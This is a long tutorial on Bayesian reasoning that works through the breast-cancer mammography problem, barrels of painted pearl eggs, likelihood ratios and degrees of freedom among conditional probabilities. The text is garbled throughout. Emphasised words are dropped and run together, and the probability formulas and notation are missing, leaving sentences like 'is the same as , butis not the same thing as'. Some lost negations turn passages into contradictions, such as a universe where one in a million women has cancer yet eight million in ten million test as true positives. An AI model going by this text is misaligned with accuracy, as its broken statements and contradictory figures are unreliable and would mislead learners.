Out of 10,000 women , 100 have breast cancer ; 80 of those 100 have positive mammographies .
From the same 10,000 women , 9,900 will not have breast cancer and of those 9,900 women , 950 will also get positive mammographies .
This makes the total number of women with positive mammographies 950+80 or 1,030 .
Of those 1,030 women with positive mammographies , 80 will have cancer .
Expressed as a proportion , this is 80 /1,030 or 0.07767 or 7.8 % .
To put it another way , before the mammography screening , the 10,000 women can be divided into two groups : Summing these two groups gives a total of 10,000 patients , confirming that none have been lost in the math .
After the mammography , the women can be divided into four groups :
As you can check , the sum of all four groups is still 10,000 .
The sum of groups A and B , the groups with breast cancer , corresponds to group 1 ; and the sum of groups C and D , the groups without breast cancer , corresponds to group 2 ; so administering a mammography does not actuallythe number of women with breast cancer .
The proportion of the cancer patients ( A + B ) within the complete set of patients ( A + B + C + D ) is the same as the 1 % prior chance that a woman has cancer : ( 80 + 20 ) / ( 80 + 20 + 950 + 8950 ) = 100 / 10000 = 1 % . The proportion of cancer patients with positive results , within the group ofpatients with positive results , is the proportion of ( A ) within ( A + C ) : 80 / ( 80 + 950 ) = 80 / 1030 = 7.8 % .
If you administer a mammography to 10,000 patients , then out of the 1030 with positive mammographies , 80 of those positive - mammography patients will have cancer .
This is the correct answer , the answer a doctor should give a positive - mammography patient if she asks about the chance she has breast cancer ; if thirteen patients ask this question , roughly 1 out of those 13 will have cancer .
The most common mistake is to ignore the original fraction of women with breast cancer , and the fraction of women without breast cancer who receive false positives , and focus only on the fraction of women with breast cancer who get positive results .
For example , the vast majority of doctors in these studies seem to have thought that if around 80 % of women with breast cancer have positive mammographies , then the probability of a women with a positive mammography having breast cancer must be around 80 % .
Figuring out the final answer always requirespieces of information - the percentage of women with breast cancer , the percentage of women without breast cancer who receive false positives , and the percentage of women with breast cancer who receive ( correct ) positives .
To see that the final answer always depends on the original fraction of women with breast cancer , consider an alternate universe in which only one woman out of a million has breast cancer .
Even if mammography in this worlddetects breast cancer in 8 out of 10 cases , while returning a false positive on a woman without breast cancer in only 1 out of 10 cases , there will still be a hundred thousand false positives for every real case of cancer detected .
The original probability that a woman has cancer is so extremely low that , although a positive result on the mammography doesthe estimated probability , the probability is n't increased to certainty or even " a noticeable chance " ; the probability goes from 1:1,000,000 to 1:100,000 .
Similarly , in an alternate universe where only one out of a million women doeshave breast cancer , a positive result on the patient 's mammography obviously does n't mean that she has an 80 % chance of having breast cancer !
If this were the case her estimated probability of having cancer would have been revised drasticallyafter she got aresult on her mammography - an 80 % chance of having cancer is a lot less than 99.9999 % !
If you administer mammographies to ten million women in this world , around eight million women with breast cancer will get correct positive results , while one woman without breast cancer will get false positive results .
Thus , if you got a positive mammography in this alternate universe , your chance of having cancer would go from 99.9999 % up to 99.999987 % .
That is , your chance of being healthy would go from 1:1,000,000 down to 1:8,000,000 .
These two extreme examples help demonstrate that the mammography result doesn ' tyour old information about the patient 's chance of having cancer ; the mammographythe estimated probability in the direction of the result .
A positive result slides the original probability upward ; a negative result slides the probability downward .
For example , in the original problem where 1 % of the women have cancer , 80 % of women with cancer get positive mammographies , and 9.6 % of women without cancer get positive mammographies , a positive result on the mammographythe 1 % chance upward to 7.8 % .
Most people encountering problems of this type for the first time carry out the mental operation ofthe original 1 % probability with the 80 % probability that a woman with cancer gets a positive mammography .
It may seem like a good idea , but it just does n't work .
" The probability that a woman with a positive mammography has breast cancer " is not at all the same thing as " the probability that a woman with breast cancer has a positive mammography " ; they are as unlike as apples and cheese .
Finding the final answer , " the probability that a woman with a positive mammography has breast cancer " , uses all three pieces of problem information - " the prior probability that a woman has breast cancer " , " the probability that a woman with breast cancer gets a positive mammography " , and " the probability that a woman without breast cancer gets a positive mammography " .
To see that the final answer always depends on the chance that a womanbreast cancer gets a positive mammography , consider an alternate test , mammography +.
Like the original test , mammography + returns positive for 80 % of women with breast cancer .
However , mammography + returns a positive result for only one out of a million women without breast cancer - mammography + has the same rate of false negatives , but a vastly lower rate of false positives .
Suppose a patient receives a positive mammography +.
What is the chance that this patient has breast cancer ?
Under the new test , it is a virtual certainty - 99.988 % , i.e. , a 1 in 8082 chance of being healthy .
Remember , at this point , that neither mammography nor mammography + actuallythe number of women who have breast cancer .
It may seem like " There is a virtual certainty you have breast cancer " is a terrible thing to say , causing much distress and despair ; that the more hopeful verdict of the previous mammography test - a 7.8 % chance of having breast cancer - was much to be preferred .
This comes under the heading of " Do n't shoot the messenger " .
The number of women who really do have cancer stays exactly the same between the two cases .
Only the accuracy with which wecancer changes .
Under the previous mammography test , 80 women with cancer ( whohad cancer , before the mammography ) are first told that they have a 7.8 % chance of having cancer , creating X amount of uncertainty and fear , after which more detailed tests will inform them that they definitely do have breast cancer .
The old mammography test also involves informing 950 womenbreast cancer that they have a 7.8 % chance of having cancer , thus creating twelve times as much additional fear and uncertainty .
The new test , mammography + , doesgive 950 women false positives , and the 80 women with cancer are told the same facts they would have learned eventually , only earlier and without an intervening period of uncertainty .
Mammography + is thus a better test in terms of its total emotional impact on patients , as well as being more accurate .
Regardless of its emotional impact , it remains a fact that a patient with positive mammography + has a 99.988 % chance of having breast cancer .
Of course , that mammography + doesgive 950 healthy women false positives means that all 80 of the patients with positive mammography + will be patients with breast cancer .
Thus , if you have a positive mammography + , your chance of having cancer is a virtual certainty .
It ismammography + does not generate as many false positives ( and needless emotional stress ) , that the ( much smaller ) group of patients whoget positive results will be composed almost entirely of genuine cancer patients ( who have bad news coming to them regardless of when it arrives ) .
Similarly , let 's suppose that we have adiscriminating test , mammography * , that still has a 20 % rate of false negatives , as in the original case .
However , mammography * has an 80 % rate of false positives .
In other words , a patientbreast cancer has an 80 % chance of getting a false positive result on her mammography * test .
If we suppose the same 1 % prior probability that a patient presenting herself for screening has breast cancer , what is the chance that a patient with positive mammography * has cancer ?
After mammography * screening : The result works out to 80 / 8,000 , or 0.01 .
This is exactly the same as the 1 % prior probability that a patient has breast cancer !
A " positive " result on mammography * does n't change the probability that a woman has breast cancer at all .
You can similarly verify that a " negative " mammography * also counts for nothing .
And in fact itbe this way , because if mammography * has an 80 % hit rate for patients with breast cancer , and also an 80 % rate of false positives for patients without breast cancer , then mammography * is completelywith breast cancer .
There 's no reason to call one result " positive " and one result " negative " ; in fact , there 's no reason to call the test a " mammography " .
You can throw away your expensive mammography * equipment and replace it with a random number generator that outputs a red light 80 % of the time and a green light 20 % of the time ; the results will be the same .
Furthermore , there 's no reason to call the red light a " positive " result or the green light a " negative " result .
You could have a green light 80 % of the time and a red light 20 % of the time , or a blue light 80 % of the time and a purple light 20 % of the time , and it would all have the same bearing on whether the patient has breast cancer : i.e. , no bearing whatsoever .
We can show algebraically that thishold for any case where the chance of a true positive and the chance of a false positive are the same , i.e : Now consider a test where the probability of a true positive and the probability of a false positive are the same number M ( in the example above , M=80 % or M = 0.8 ) :
The proportion of patients with breast cancer , within the group of patients with a " positive " result , then equals 100*M / ( 100 * M + 9900 * M ) = 100 / ( 100 + 9900 ) = 1 % .
This holds true regardless of whether M is 80 % , 30 % , 50 % , or 100 % .
If we have a mammography * test that returns " positive " results for 90 % of patients with breast cancer and returns " positive " results for 90 % of patients without breast cancer , the proportion of " positive " - testing patients who have breast cancer will still equal the original proportion of patients with breast cancer , i.e. , 1 % .
You can run through the same algebra , replacing the prior proportion of patients with breast cancer with an arbitrary percentage P : After a " cancer test " that returns " positive " for a fraction M of patients with breast cancer , and also returns " positive " for the same fraction M of patientscancer :
The chance that a patient with a " positive " result has breast cancer is then the proportion of group A within the combined group A + C , or P*M / [ P*M + ( 1 - P ) *M ] , which , cancelling the common factor M from the numerator and denominator , is P / [ P + ( 1 - P ) ] or P / 1 or just P .
If the rate of false positives is the same as the rate of true positives , you always have the same probability after the test as when you started .
Which is common sense .
Take , for example , the " test " of flipping a coin ; if the coin comes up heads , does it tell you anything about whether a patient has breast cancer ?
No ; the coin has a 50 % chance of coming up heads if the patient has breast cancer , and also a 50 % chance of coming up heads if the patient does not have breast cancer .
Therefore there is no reason to call either heads or tails a " positive " result .
It 's not the probability being " 50/50 " that makes the coin a bad test ; it 's that the two probabilities , for " cancer patient turns up heads " and " healthy patient turns up heads " , are the same .
If the coin was slightly biased , so that it had a 60 % chance of coming up heads , it still would n't be a cancer test - what makes a coin a poor test is not that it has a 50/50 chance of coming up heads if the patient has cancer , but that it also has a 50/50 chance of coming up heads if the patient does not have cancer .
You can even use a test that comes up " positive " for cancer patients 100 % of the time , and still not learn anything .
An example of such a test is " Add 2 + 2 and see if the answer is 4 . "
This test returns positive 100 % of the time for patients with breast cancer .
It also returns positive 100 % of the time for patients without breast cancer .
So you learn nothing .
The original proportion of patients with breast cancer is known as the The chance that a patient with breast cancer gets a positive mammography , and the chance that a patient without breast cancer gets a positive mammography , are known as the twoCollectively , this initial information is known as The final answer - the estimated probability that a patient has breast cancer , given that we know she has a positive result on her mammography - is known as theor the What we 've just shown is that Actually , priors are true or false just like the final answer - they reflect reality and can be judged by comparing them against reality .
For example , if you think that 920 out of 10,000 women in a sample have breast cancer , and the actual number is 100 out of 10,000 , then your priors are wrong .
For our particular problem , the priors might have been established by three studies - a study on the case histories of women with breast cancer to see how many of them tested positive on a mammography , a study on women without breast cancer to see how many of them test positive on a mammography , and an epidemiological study on the prevalence of breast cancer in some specific demographic .
Suppose that a barrel contains many small plastic eggs .
Some eggs are painted red and some are painted blue .
40 % of the eggs in the bin contain pearls , and 60 % contain nothing .
30 % of eggs containing pearls are painted blue , and 10 % of eggs containing nothing are painted blue .
What is the probability that a blue egg contains a pearl ?
For this example the arithmetic is simple enough that you may be able to do it in your head , and I would suggest trying to do so .
A more compact way of specifying the problem : is shorthand for " not " , soreads " not pearl " .
is shorthand for " blue given pearl " or " the probability that an egg is painted blue , given that the egg contains a pearl " .
One thing that 's confusing about this notation is that the order of implication is read right - to - left , as in Hebrew or Arabic .
means " bluepearl " , the degree to which pearl - ness implies blue - ness , not the degree to which blue - ness implies pearl - ness .
This is confusing , but it 's unfortunately the standard notation in probability theory .
Readers familiar with quantum mechanics will have already encountered this peculiarity ; in quantum mechanics , for example , reads as " the probability that a particle at A goes to B , then to C , ending up at D " .
To follow the particle , you move your eyes from right to left .
Reading from left to right , means " given " ; reading from right to left , means " implies " or " leads to " .
Thus , moving your eyes from left to right , reads " blue given pearl " or " the probability that an egg is painted blue , given that the egg contains a pearl " .
Moving your eyes from right to left , reads " pearl implies blue " or " the probability that an egg containing a pearl is painted blue " .
The item on the right side is what youor theand the item on the left side is theorIf we have , and wethat some egg contains a pearl , then we canthere is a 30 % chance that the egg is painted blue .
Thus , the final fact we 're looking for - " the chance that a blue egg contains a pearl " or " the probability that an egg contains a pearl , if we know the egg is painted blue " - readsLet 's return to the problem .
We have that 40 % of the eggs contain pearls , and 60 % of the eggs contain nothing .
30 % of the eggs containing pearls are painted blue , so 12 % of the eggs altogether contain pearls and are painted blue .
10 % of the eggs containing nothing are painted blue , so altogether 6 % of the eggs contain nothing and are painted blue .
A total of 18 % of the eggs are painted blue , and a total of 12 % of the eggs are painted blue and contain pearls , so the chance a blue egg contains a pearl is 12/18 or 2/3 or around 67 % .
The applet below , courtesy of Christian Rovner , shows a graphic representation of this problem : ( Are you having trouble seeing this applet ?
Do you see an image of the applet rather than the applet itself ?
Try downloading an updated Java .) Looking at this applet , it 's easier to see why the final answer depends on all three probabilities ; it 's thebetween the two conditional probabilities , and , thatthe prior probabilityto the posterior probability
As before , we can see the necessity of all three pieces of information by considering extreme cases ( feel free to type them into the applet ) .
In a ( large ) barrel in which only one egg out of a thousand contains a pearl , knowing that an egg is painted blue slides the probability from 0.1 % to 0.3 % ( instead of sliding the probability from 40 % to 67 % ) .
Similarly , if 999 out of 1000 eggs contain pearls , knowing that an egg is blue slides the probability from 99.9 % to 99.966 % ; the probability that the egg doescontain a pearl goes from 1/1000 to around 1/3000 .
Even when the prior probability changes , the differential pressure of the two conditional probabilities always slides the probability in the same
If you learn the egg is painted blue , the probability the egg contains a pearl always goes - but it goes upthe prior probability , so you need to know the prior probability in order to calculate the final answer .
0.1 % goes up to 0.3 % , 10 % goes up to 25 % , 40 % goes up to 67 % , 80 % goes up to 92 % , and 99.9 % goes up to 99.966 % .
If you 're interested in knowing how any other probabilities slide , you can type your own prior probability into the Java applet .
You can also click and drag the dividing line betweenandin the upper bar , and watch the posterior probability change in the bottom bar .
Studies of clinical reasoning show that most doctors carry out the mental operation ofthe original 1 % probability with the 80 % probability that a woman with cancer would get a positive mammography .
Similarly , on the pearl - egg problem , most respondents unfamiliar with Bayesian reasoning would probably respond that the probability a blue egg contains a pearl is 30 % , or perhaps 20 % ( the 30 % chance of a true positive minus the 10 % chance of a false positive ) .
Even if this mental operation seems like a good idea at the time , it makes no sense in terms of the question asked .
It 's like the experiment in which you ask a second - grader : " If eighteen people get on a bus , and then seven more people get on the bus , how old is the bus driver ? "
Many second - graders will respond : " Twenty - five . "
They understand when they 're being prompted to carry out a particular mental procedure , but they have n't quite connected the procedure to reality .
Similarly , to find the probability that a woman with a positive mammography has breast cancer , it makes no sense whatsoever tothe original probability that the woman has cancer with the probability that a woman with breast cancer gets a positive mammography .
Neither can you subtract the probability of a false positive from the probability of the true positive .
These operations are as wildly irrelevant as adding the number of people on the bus to find the age of the bus driver .
I keep emphasizing the idea that evidenceprobability because of research that shows people tend to use spatial intutions to grasp numbers .
In particular , there 's interesting evidence that we have an innate sense of quantity that 's localized to left inferior parietal cortex - patients with damage to this area can selectively lose their sense of whether 5 is less than 8 , while retaining their ability to read , write , and so on .
( Yes , really ! )
The parietal cortex processes our sense of where things are in space ( roughly speaking ) , so an innate " number line " , or rather " quantity line " , may be responsible for the human sense of numbers .
This is why I suggest visualizing Bayesian evidence asthe probability along the number line ; my hope is that this will translate Bayesian reasoning into something that makes sense to innate human brainware .
( That , really , is what an " intuitive explanation " )
For more information , see Stanislas Dehaene 'sA study by Gigerenzer and Hoffrage in 1995 showed that some ways of phrasing story problems are much more evocative of correct Bayesian reasoning .
Theevocative phrasing used probabilities .
A slightly more evocative phrasing used frequencies instead of probabilities ; the problem remained the same , but instead of saying that 1 % of women had breast cancer , one would say that 1 out of 100 women had breast cancer , that 80 out of 100 women with breast cancer would get a positive mammography , and so on .
Why did a higher proportion of subjects display Bayesian reasoning on this problem ?
Probably because saying " 1 out of 100 women " encourages you to concretely visualize X women with cancer , leading you to visualize X women with cancer and a positive mammography , etc .
The most effective presentation found so far is what 's known as- saying that 40 out of 100 eggs contain pearls , 12 out of 40 eggs containing pearls are painted blue , and 6 out of 60 eggs containing nothing are painted blue .
Apresentation is one in which the information about the prior probability is included in presenting the conditional probabilities .
If you were just learning about the eggs ' conditional probabilities through natural experimentation , you would - in the course of cracking open a hundred eggs - crack open around 40 eggs containing pearls , of which 12 eggs would be painted blue , while cracking open 60 eggs containing nothing , of which about 6 would be painted blue .
In the course of learning the conditional probabilities , you 'd see examples of blue eggs containing pearls about twice as often as you saw examples of blue eggs containing nothing .
It may seem like presenting the problem in this way is " cheating " , and indeed if it were a story problem in a math book , it probablybe cheating .
However , if you 're talking about real doctors , youto cheat ; you the doctors to draw the right conclusions as easily as possible .
The obvious next move would be to present all medical statistics in terms of natural frequencies .
Unfortunately , while natural frequencies are a step in the right direction , it probably wo n't be enough .
When problems are presented in natural frequences , the proportion of people using Bayesian reasoning rises to around half .
A big improvement , but not big enough when you 're talking about real doctors and real patients .
A presentation of the problem inmight be visualized like this :
In the frequency visualization , theof the two conditional probabilities changes theof eggs that contain pearls .
The bottom bar is shorter than the top bar , just as the number of eggs painted blue is less than the total number of eggs .
The probability graph shown earlier is really just the frequency graph with the bottom bar " renormalized " , stretched out to the same length as the top bar .
In the frequency applet you can change the conditional probabilities by clicking and dragging the left and right edges of the graph .
( For example , to change the conditional probability , click and drag the line on the left that stretches from the left edge of the top bar to the left edge of the bottom bar . )
In the probability applet , you can see that when the conditional probabilities are equal , there 's nopressure - the arrows are the same size - so the prior probability does n't slide between the top bar and the bottom bar .
But the bottom bar in the probability applet is just a renormalized ( stretched out ) version of the bottom bar in the frequency applet , and the frequency applet showsthe probability does n't slide if the two conditional probabilities are equal .
Here 's a case where the prior proportion of pearls remains 40 % , and the proportion of pearl eggs painted blue remains 30 % , but the number of empty eggs painted blue is also 30 % :
If you diminish two shapes by the same factor , their relative proportion will be the same as before .
If you diminish the left section of the top bar by the same factor as the right section , then the bottom bar will have the same proportions as the top bar - it'll just be smaller .
If the two conditional probabilities are equal , learning that the egg is blue does n't change the probability that the egg contains a pearl - for the same reason that similar triangles have identical angles ; geometric figures do n't change shape when you shrink them by a constant factor .
In this case , you might as well just say thatsince the probability of an egg being painted blue is independent of whether the egg contains a pearl .
Applying a " test " that is statistically independent of its condition just shrinks the sample size .
In this case , requiring that the egg be painted blue does n't shrink the group of eggs with pearls any more or less than it shrinks the group of eggs without pearls .
It just shrinks the total number of eggs in the sample .
Here 's what the original medical problem looks like when graphed .
1 % of women have breast cancer , 80 % of those women test positive on a mammography , and 9.6 % of women without breast cancer also receive positive mammographies .
As is now clearly visible , the mammography does n't increase the probability a positive - testing woman has breast cancer by increasing the number of women with breast cancer - of course not ; if mammography increased the number of women with breast cancer , no one would ever take the test !
However , a positive mammography is a membership test thatmany more women without breast cancer than women with cancer .
The number of women without breast cancer diminishes by a factor of more than ten , from 9,900 to 950 , while the number of women with breast cancer is diminished only from 100 to 80 .
Thus , the proportion of 80 within 1,030 is much larger than the proportion of 100 within 10,000 .
In the graph , the left sector ( representing women with breast cancer ) is small , but the mammography test projects almost all of this sector into the bottom bar .
The right sector ( representing women without breast cancer ) is large , but the mammography test projects a much smaller fractionof this sector into the bottom bar .
There are , indeed , fewer women with breast cancer and positive mammographies than there are women with breast cancer - obeying the law of probabilities which requires that .
But even though the left sector in the bottom bar is actually slightly smaller , the proportion of the left sectorthe bottom bar is greater - though still not very great .
If the bottom bar were renormalized to the same length as the top bar , it would look like the left sector had expanded .
This is why the proportion of " women with breast cancer " in the group " women with positive mammographies " is higher than the proportion of " women with breast cancer " in the general population - although the proportion is still not very high .
The evidence of the positive mammography slides the prior probability of 1 % to the posterior probability of 7.8 % .
Suppose there 's yet another variant of the mammography test , mammography@ , which behaves as follows .
1 % of women in a certain demographic have breast cancer .
Like ordinary mammography , mammography@ returns positive 9.6 % of the time for women without breast cancer .
However , mammography@ returns positive 0 % of the time ( say , once in a billion ) for women with breast cancer .
The graph for this scenario looks like this :
What is it that this test actually does ?
If a patient comes to you with a positive result on her mammography@ , what do you say ?
" Congratulations , you 're among the rare 9.5 % of the population whose health is definitely established by this test .
" Mammography@ is n't a cancer test ; it 's a health test !
Few women without breast cancer get positive results on mammography@ , butwomen without breast cancer ever get positive results at all .
Not much of the right sector of the top bar projects into the bottom bar , butof the left sector projects into the bottom bar .
So a positive result on mammography@ means youdo n't have breast cancer .
What makes ordinary mammography aindicator for breast cancer is not that someonethe result " positive " , but rather that the test result stands in a specific Bayesian relation to the condition of breast cancer .
You could call the same result " positive " or " negative " or " blue " or " red " or " James Rutherford " , or give it no name at all , and the test result would still slide the probability in exactly the same way .
To minimize confusion , a test result which slides the probability of breast cancer upward should be called " positive " .
A test result which slides the probability of breast cancer downward should be called " negative " .
If the test result is statistically unrelated to the presence or absence of breast cancer - if the two conditional probabilities are equal - then we should n't call the procedure a " cancer test " !
Theof the test is determined by the two conditional probabilities ; any names attached to the results are simply convenient labels .
The bottom bar for the graph of mammography@ is small ; mammography@ is a test that 's only rarely useful .
Or rather , the test only rarely givesevidence , and most of the time givesevidence .
A negative result on mammography@ does slide probability - it just does n't slide it very far .
Click the " Result " switch at the bottom left corner of the applet to see what aresult on mammography@ would imply .
You might intuit that since the testhave returned positive for health , but did n't , then the failure of the test to return positive must mean that the woman has a higher chance of having breast cancer - that her probability of having breast cancer must be slid upward by the negative result on her health test .
This intuition is correct !
The sum of the groups with negative results and positive results must always equal the group of all women .
If the positive - testing group has " more than its fair share " of womenbreast cancer , there must be an at least slightly higher proportion of womencancer in the negative - testing group .
A positive result is rare but very strong evidence in one direction , while a negative result is common but very weak evidence in the opposite direction .
You might call this the Law of Conservation of Probability - not a standard term , but the conservation rule is exact .
If you take the revised probability of breast cancer after a positive result , times theof a positive result , and add that to the revised probability of breast cancer after a negative result , times theof a negative result , then you must always arrive at the prior probability .
If you do n't yetwhat the test result is , theafter the test result arrives - taking both possible results into account - should always equal the prior probability .
On ordinary mammography , the test is expected to return " positive " 10.3 % of the time - 80 positive women with cancer plus 950 positive women without cancer equals 1030 women with positive results .
Conversely , the mammography should return negative 89.7 % of the time : 100 % - 10.3 % = 89.7 % .
A positive result slides the revised probability from 1 % to 7.8 % , while a negative result slides the revised probability from 1 % to 0.22 % .
So , as expected .
Why " as expected " ?
Let 's take a look at the quantities involved :
One of the common confusions in using Bayesian reasoning is to mix up some or all of these quantities - which , as you can see , are all numerically different and have different meanings .is the same as , butis not the same thing as , andis completely different from .
( I do n't know who chose the symmetricalsymbol to mean " implies " , and then made the direction of implication right - to - left , but it was probably a bad idea . )
To get acquainted with all these quantities and the relationships between them , we 'll play " follow the degrees of freedom " .
For example , the two quantitiesandhave 1 degree of freedom between them , because of the general law .
If you know that , you can obtain .
There 's no room to say thatand then also specify ; it would violate the ruleandalso have only one degree of freedom between them ; either a woman with breast cancer gets a positive mammography or she does n't .
On the other hand , andhavedegrees of freedom .
You can have a mammography test that returns positive for 80 % of cancerous patients and 9.6 % of healthy patients , or that returns positive for 70 % of cancerous patients and 2 % of healthy patients , or even a health test that returns " positive " for 30 % of cancerous patients and 92 % of healthy patients .
The two quantities , the output of the mammography test for cancerous patients and the output of the mammography test for healthy patients , are in mathematical terms independent ; one cannot be obtained from the other in any way , and so they have two degrees of freedom between them .
What about , and ?
Here we have three quantities ; how many degrees of freedom are there ?
In this case the equation that must hold is .
This equality reduces the degrees of freedom by one .
If we know the fraction of patients with cancer , and chance that a cancerous patient has a positive mammography , we can deduce the fraction of patients who have breast cancera positive mammography by multiplying .
You should recognize this operation from the graph ; it 's the projection of the top bar into the bottom bar .is the left sector of the top bar , anddetermines how much of that sector projects into the bottom bar , and the left sector of the bottom bar isSimilarly , if we know the number of patients with breast cancer and positive mammographies , and also the number of patients with breast cancer , we can estimate the chance that a woman with breast cancer gets a positive mammography by dividing : .
In fact , this is exactly how such medical diagnostic tests are calibrated ; you do a study on 8,520 women with breast cancer and see that there are 6,816 ( or thereabouts ) women with breast cancerpositive mammographies , then divide 6,816 by 8520 to find that 80 % of women with breast cancer had positive mammographies .
( Incidentally , if you accidentally divide 8520 by 6,816 instead of the other way around , your calculations will start doing strange things , such as insisting that 125 % of women with breast cancer and positive mammographies have breast cancer .
This is a common mistake in carrying out Bayesian arithmetic , in my experience . )
And finally , if you knowand , you can deduce how many cancer patients there must have been originally .
There are two degrees of freedom shared out among the three quantities ; if we know any two , we can deduce the third .
How about , and ?
Again there are only two degrees of freedom among these three variables .
The equation occupying the extra degree of freedom is .
This is howis computed to begin with ; we figure out the number of women with breast cancer who have positive mammographies , and the number of women without breast cancer who have positive mammographies , then add them together to get the total number of women with positive mammographies .
It would be very strange to go out and conduct a study to determine the number of women with positive mammographies - just that one number and nothing else - but in theory you could do so .
And if you then conducted another study and found the number of those women who had positive mammographiesbreast cancer , you would also know the number of women with positive mammographies andbreast cancer - either a woman with a positive mammography has breast cancer or she does n't .
In general , .
Symmetrically , What about , and ?
You might at first be tempted to think that there are only two degrees of freedom for these four quantities - that you can , for example , getby multiplying , and thus that all four quantities can be found given only the two quantitiesand .
This is not the case ! only if the two probabilities are - if the chance that a woman has breast cancer has no bearing on whether she has a positive mammography .
As you 'll recall , this amounts to requiring that the two conditional probabilities be equal to each other - a requirement which would eliminate one degree of freedom .
If you remember that these four quantities are the groups A , B , C , and D , you can look over those four groups and realize that , in theory , you can put any number of people into the four groups .
If you start with a group of 80 women with breast cancer and positive mammographies , there 's no reason why you can't add another group of 500 women with breast cancer and negative mammographies , followed by a group of 3 women without breast cancer and negative mammographies , and so on .
So now it seems like the four quantities have four degrees of freedom .
And they would , except that in expressing them aswe need to normalize them toof the complete group , which adds the constraint that .
This equation takes up one degree of freedom , leaving three degrees of freedom among the four quantities .
If you specify theof women in groups A , B , and D , you can deduce the fraction of women in group C. Given the four groups A , B , C , and D , it is very straightforward to compute everything else : , and so on .
Since ABCD contains three degrees of freedom , it follows that the entire set of 16 probabilities contains only three degrees of freedom .
Remember that in our problems we always neededpieces of information - the prior probability and the two conditional probabilities - which , indeed , have three degrees of freedom among them .
Actually , for Bayesian problems , three quantities with three degrees of freedom between them should logically specify the entire problem .
For example , let 's take a barrel of eggs with , and .
Given this information , youcomputeAs a story problem : Suppose you have a large barrel containing a number of plastic eggs .
Some eggs contain pearls , the rest contain nothing .
Some eggs are painted blue , the rest are painted red .
Suppose that 40 % of the eggs are painted blue , 5/13 of the eggs containing pearls are painted blue , and 20 % of the eggs are both empty and painted red .
What is the probability that an egg painted blue contains a pearl ?
Try it - I assure you it is possible .
You probably should n't try to solve this with just a Javascript calculator , though .
I used a Python console .
( In theory , pencil and paper should also work , but I do n't know anyone who owns a pencil so I could n't try it personally . )
As a check on your calculations , does the ( meaningless ) quantityroughly equal .51 ?
( In story problem terms :
The likelihood that a red egg is empty , divided by the likelihood that an egg contains a pearl , equals approximately .51 . )
Of course , using this information in the problem would be cheating .
If you can solveproblem , then when we revisit Conservation of Probability , it seems perfectly straightforward .
Of course the mean revised probability , after administering the test , must be the same as the prior probability .
Of course strong but rare evidence in one direction must be counterbalanced by common but weak evidence in the other direction .
Because :
In terms of the four groups : Let 's return to the original barrel of eggs - 40 % of the eggs containing pearls , 30 % of the pearl eggs painted blue , 10 % of the empty eggs painted blue .
The graph for this problem is : What happens to the revised probability , , if the proportion of eggs containing pearls is kept constant , but 60 % of the eggs with pearls are painted blue ( instead of 30 % ) , and 20 % of the empty eggs are painted blue ( instead of 10 % ) ?
You could type 60 % and 20 % into the inputs for the two conditional probabilities , and see how the graph changes - but can you figure out in advance what the change will look like ?
If you guessed that the revised probabilitybecause the bottom bar grows by a factor of 2 but retains the same proportions , congratulations !
Take a moment to think about how far you 've come .
Looking at a problem likethe vast majority of respondents intuit that around 70 - 80 % of women with positive mammographies have breast cancer .
Now , looking at a problem likeyou can see it 'sthat the probability of a blue egg containing a pearl is the same for either barrel .
Imagine how hard it would be to see that using the old way of thinking !
It 's intuitively obvious , but how to prove it ?
Suppose that we call P the prior probability that an egg contains a pearl , that we call M the first conditional probability ( that a pearl egg is painted blue ) , and N the second conditional probability ( that an empty egg is painted blue ) .
Suppose that M and N are both increased or diminished by an arbitrary factor X - for example , in the problem above , they are both increased by a factor of 2 .
Does the revised probability that an egg contains a pearl , given that we know the egg is blue , stay the same ?
From these quantities , we get the four groups :
The proportion of eggs that contain pearls and are blue , within the group of all blue eggs , is then the proportion of group ( A ) within the group ( A + C ) , equalling .
The factor X in the numerator and denominator cancels out , so increasing or diminishing both conditional probabilities by a constant factor does n't change the revised probability .
divided byis known as theof that test .
Does the likelihood ratio of a medical test sum up everything there is to know about the usefulness of the test ?
No , it does not !
The likelihood ratio sums up everything there is to know about theof aresult on the medical test , but the meaning of aresult on the test is not specified , nor is the frequency with which the test is useful .
If we examine the algebra above , whileremains constant , may change - the X doescancel out .
As a story problem , this strange fact would look something like this :
For the first question , the answer is that we do n't care whether we get the blue egg from the first or second barrel .
For the second question , however , the probabilitieschange - in the first barrel , 34 % of the red eggs contain pearls , while in the second barrel 8.7 % of the red eggs contain pearls !
Thus , we should prefer to get a red egg from the first barrel .
In the first barrel , 70 % of the pearl eggs are painted red , and 90 % of the empty eggs are painted red .
In the second barrel , 10 % of the pearl eggs are painted red , and 70 % of the empty eggs are painted red .
What goes on here ?
We start out by noting that , counter to intuition , andhave two degrees of freedom among them even whenis fixed - so there 's no reason why one quantity should n't change while the other remains constant .
But we did n't we just get through establishing a law for " Conservation of Probability " , which says that ?
Does n't this equation take up one degree of freedom ?
No , becauseis n't fixed between the two problems .
In the second barrel , the proportion of blue eggs containing pearls is the same as in the first barrel , but a much larger fraction of eggs are painted blue !
This alters the set ofeggs in such a way that the proportionschange .
Here 's a graph for the red eggs in the second barrel :
Let 's return to the example of a medical test .
The likelihood ratio of a medical test - the number of true positives divided by the number of false positives - tells us everything there is to know about theof aresult .
But it does n't tell us the meaning of a negative result , and it does n't tell us how often the test is useful .
For example , a mammography with a hit rate of 80 % for patients with breast cancer and a false positive rate of 9.6 % for healthy patients has the same likelihood ratio as a test with an 8 % hit rate and a false positive rate of 0.96 % .
Although these two tests have the same likelihood ratio , the first test is more useful in every way - it detects disease more often , and a negative result is stronger evidence of health .
The likelihood ratio for a positive result summarizes the differential pressure of the two conditional probabilities for a positive result , and thus summarizes how much a positive result will slide the prior probability .
Take a probability graph , like this one :
The likelihood ratio of the mammography is what determines the slant of the line .
If the prior probability is 1 % , then knowing only the likelihood ratio is enough to determine the posterior probability after a positive result .
But , as you can see from the frequency graph , the likelihood ratio does n't tell the whole story - in the frequency graph , theof the bottom bar can stay fixed while theof the bottom bar changes .
increases butdoes n't change , becauseandincrease by the same factor .
But when you flip the graph to look at , the proportions ofanddoremain constant .
Of course the likelihood ratiotell the whole story ; the likelihood ratio and the prior probability together are only two numbers , while the problem has three degrees of freedom .
Suppose that you applytests for breast cancer in succession - say , a standard mammography and also some other test which is independent of mammography .
Since I do n't know of any such test which isof mammography , I 'll invent one for the purpose of this problem , and call it the Tams - Braylor Division Test , which checks to see if any cells are dividing more rapidly than other cells .
We 'll suppose that the Tams - Braylor gives a true positive for 90 % of patients with breast cancer , and gives a false positive for 5 % of patients without cancer .
Let 's say the prior prevalence of breast cancer is 1 % .
If a patient gets a positive result on her mammographyher Tams - Braylor , what is the revised probability she has breast cancer ?
